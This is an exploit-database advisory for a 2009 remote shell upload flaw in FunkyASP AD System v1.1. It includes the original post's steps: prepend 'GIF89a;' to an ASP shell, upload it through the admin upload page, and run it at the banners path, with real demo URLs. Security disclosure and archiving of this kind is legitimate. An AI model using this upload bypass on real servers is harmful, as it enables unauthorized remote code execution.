FunkyASP AD System v1.1 Remote Shell Upload

vendor:

FunkyASP AD System

by:

ZoRLu

9,3

CVSS

HIGH

Remote Shell Upload

264

CWE

Product Name: FunkyASP AD System

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:funkyasp:funkyasp_ad_system

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

FunkyASP AD System v1.1 Remote Shell Upload

FunkyASP AD System v1.1 is vulnerable to a remote shell upload vulnerability. An attacker can exploit this vulnerability by adding a malicious code to a shell file and uploading it to the vulnerable server. The malicious code can be executed by accessing the uploaded shell file. This vulnerability affects FunkyASP AD System v1.1.

Mitigation:

Upgrade to the latest version of FunkyASP AD System.

Source

Exploit-DB raw data:

[~] FunkyASP AD System v1.1 Remote Shell Upload
[~]
[~] script: http://www.funkyasp.co.uk/cats.asp?id=1&currency=GBP
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 04.04.2009
[~]
[~] Home: yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~] contact: trt-turk@hotmail.com
[~] 
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve Ulkumuz icin Buyuk KayIp Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------


first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.asp:

GIF89a;
<?

...

...

...

?>

and save your_sheell.asp

you go to here:

http://yildirimordulari.com/demo/banner/admin.asp?action=upload

and your shell here:

http://yildirimordulari.com/demo/banner/banners/z.asp

for demo:

http://demo.funkyasp.com/demo/banner/admin.asp?action=upload

shell:

http://demo.funkyasp.com/demo/banner/banners/z.asp


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-04-10]